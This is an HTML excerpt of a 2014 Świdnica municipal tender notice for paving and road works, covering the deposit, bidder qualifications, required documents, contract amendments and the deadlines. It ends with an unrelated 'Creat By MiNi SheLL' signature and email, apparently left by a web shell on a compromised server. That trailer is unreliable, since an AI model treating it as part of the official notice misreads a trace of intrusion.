Zgodnie z  § 18  projektu umowy, Wykonawca udziela Zamawiającemu gwarancji jakości na okres 5  lat na wszystkie wykonane prace budowlane, licząc od daty odbioru i przekazania do użytkowania przedmiotu zamówienia. 
Wymagany okres rękojmi 24 m-ce - na warunkach i zasadach określonych przepisami KC oraz warunkami określonymi w karcie gwarancyjnej. 
UWAGA!  Termin realizacji przedmiotu zamówienia oraz udzielonej gwarancji nie jest kryterium oceny oferty, jest natomiast warunkiem przyjęcia oferty.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o  art.67 ust.1 pkt.6 UPZP przewiduje  możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 15% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 13.  WYMAGANIA DOTYCZĄCE WADIUM : 
13.1	Oferta powinna być zabezpieczona wadium w wysokości: 5.000 zł (słownie: pięć tysięcy złotych)
13.2	Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 25-04-2014 r. przed godz. 09:00
13.3	Wadium może być wniesione w formach określonych w art.45 ust.6 UPZP, z tym, że:
1)	złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO. S.A. I Oddział                      w Świdnicy 96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.
2)	złożone w gwarancjach (bankowych , ubezpieczeniowych):
z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 UPZP tj. w przypadku, gdy Wykonawca:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
d)	oraz w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to  z przyczyn nieleżących po jego stronie,
3)	Złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony za potwierdzeniem, przed upływem terminu składania ofert. 
13.4	Dowód przelewu lub potwierdzenie depozytu (oryginał) należy dołączyć do oferty. 
13.5	Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
13.6	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem jak w ust.  13.8.
13.7	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
13.8	Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
13.9	Zamawiający zatrzymuje wadium jeżeli Wykonawca, którego oferta została wybrana:
a/	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b/	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c/	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
d/	w odpowiedzi na wezwanie , o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń,                   o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że  w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył)  co najmniej 2 roboty budowlane              o wartości nie mniejszej  niż 200 000,00 zł brutto (słownie: dwieście  tysięcy złotych brutto) każda,  polegające na budowie lub przebudowie elementów dróg takich jak: chodniki, ciągi pieszo-jezdne, ścieżki rowerowe, zatoki postojowe, parkingi itp. z  kostki brukowej betonowej.  
Opis dla potwierdzenia tego warunku powinien być wskazany w załączniku nr 2 do oferty Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub dysponować będzie osobą przewidzianą do uczestnictwa w wykonaniu zamówienia, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, oraz min. 2 letnie doświadczenie w kierowaniu tymi robotami. Wykonawca obowiązany jest podać informację o podstawie do dysponowania tą  osobą;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości minimum  200.000,00 zł.            (słownie: dwieście tysięcy złotych) oraz że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, związanej  z  przedmiotem  zamówienia na sumę ubezpieczenia nie mniejszą niż:  100.000,00 zł. (sto tysięcy złotych);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca wykaże, że  w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył)  co najmniej 2 roboty budowlane              o wartości nie mniejszej  niż 200 000,00 zł brutto (słownie: dwieście  tysięcy złotych brutto) każda,  polegające na budowie lub przebudowie elementów dróg takich jak: chodniki, ciągi pieszo-jezdne, ścieżki rowerowe, zatoki postojowe, parkingi itp. z  kostki brukowej betonowej.  
Opis dla potwierdzenia tego warunku powinien być wskazany w załączniku nr 2 do oferty Wykonawcy.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów (art. 369 k.c.);</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>8.9.1	dowód wniesienia wadium, zgodnie z zapisami rozdz.12, (załącznik nr 16 do oferty Wykonawcy),
8.9.2	pełnomocnictwo do podpisania oferty w przypadku, gdy ofertę podpisuje osoba (osoby nie wskazane w dokumencie rejestrowym) upoważniona  do składania oświadczeń woli przez Wykonawcę  (załącznik nr 17 do oferty Wykonawcy),
8.9.3	pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej (zał. nr 18  do oferty Wykonawcy),
8.9.4	informację o przynależności do grupy kapitałowej, w przypadku gdy Wykonawca należy do grupy kapitałowej (zał. nr 19 do oferty Wykonawcy),
8.9.5	formularz cenowy, o którym mowa w rozdz.17, pkt. 17.1 - Opis sposobu obliczania ceny, (załącznik              nr 20 do oferty Wykonawcy),
8.9.6	wykaz części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom (zał. nr 6 do oferty Wykonawcy). Wykonawca winien uzyskać zgodę Zamawiającego na zawarcie umów z podwykonawcami przed zawarciem umowy z Zamawiającym - rozdz. 19. ust. 19.4 specyfikacji.
8.9.7	zaparafowany projekt umowy - załącznik B do SIWZ (zał. nr 21  do oferty Wykonawcy),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>21.  ISTOTNE DLA STRON POSTANOWIENIA UMOWY 
21.1	Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach jak umowa, której projekt stanowi załącznik B do SIWZ (zał. Nr 21 do oferty Wykonawcy).
21.2	Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony  w następujących przypadkach:
1)	jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),np. z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez strony umowy, jeżeli te zmiany są korzystne dla Zamawiającego.
2)	jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia, np. jeżeli nastąpi zmiana stawki podatku od towarów i usług (VAT),
21.3	Zamawiający przewiduje możliwość  przedłużenia terminu wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy                       w przypadku:
1)	wprowadzenia  zmian w Dokumentacji, wynikających z konieczności dostosowania zakresu zadania do powszechnie obowiązujących przepisów prawa, 
2)	wprowadzeniem zmian zakresu robót, w związku ze zmianą technologii dokonanych na wniosek Zamawiającego lub zaakceptowanych przez Zamawiającego,
3)	zawieszenia robót przez Zamawiającego,
4)	braku możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych 
5)	wystąpienia siły wyższej, przy czym za siłę wyższą uznaje się zdarzenie nagłe, nadzwyczajne, zewnętrzne  i niemożliwe do przewidzenia, którego nie udało się uniknąć nawet w wypadku najwyższej staranności stron, 
6)	nieterminowego z przyczyn niezależnych od Wykonawcy, przekazania przez Zamawiającego terenu budowy Wykonawcy lub 
7)	wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę lub 
8)	opóźnieniem  związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub 
9)	koniecznością wykonania zamówień dodatkowych
            jeżeli zaistnienie w/w zdarzeń będzie miało wpływ na terminowe wykonanie przedmiotu umowy.
21.4	W przypadkach losowych Wykonawca może dokonać zmian osób, pełniących funkcje kierownicze na budowie z zachowaniem właściwych kwalifikacji zawodowych.
21.5	Dopuszcza się wprowadzenie w umowie zmian dotyczących treści o charakterze informacyjnym lub instrukcyjnym, niezbędnym do realizacji Umowy, w szczególności zmian dotyczących numeru rachunku bankowego Wykonawcy lub Zamawiającego, zmiany osób upoważnionych do komunikowania się, zmiany osób odpowiedzialnych za potwierdzenie prawidłowej realizacji Umowy wraz z adresami, numerami telefonów, telefaksów, adresów poczty elektronicznej, itp. nie są zmianami istotnymi i zawsze dopuszczalne za porozumieniem stron.
21.6	Zmiany w umowie mogą być dopuszczone wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę  i po akceptacji Zamawiającego.
21.7	Zamawiający dopuszcza udzielenie zamówień uzupełniających, o którym mowa w art. 67  ust. 1 pkt  1a, pkt 5 i pkt  6 ustawy z dnia 29.01.2004 r. Prawo Zamówień Publicznych (tekst jednolity Dz.U. z 2013r., poz. 907 ze zm.), stanowiących nie więcej niż 15% wartości zamówienia podstawowego
21.8	Wszelkie zamówienia uzupełniające oraz roboty dodatkowe realizowane przez Wykonawcę nie mogą pogorszyć jakości technicznej i technologicznej przedmiotu zamówienia opisanego w dokumentacji projektowej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2014 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com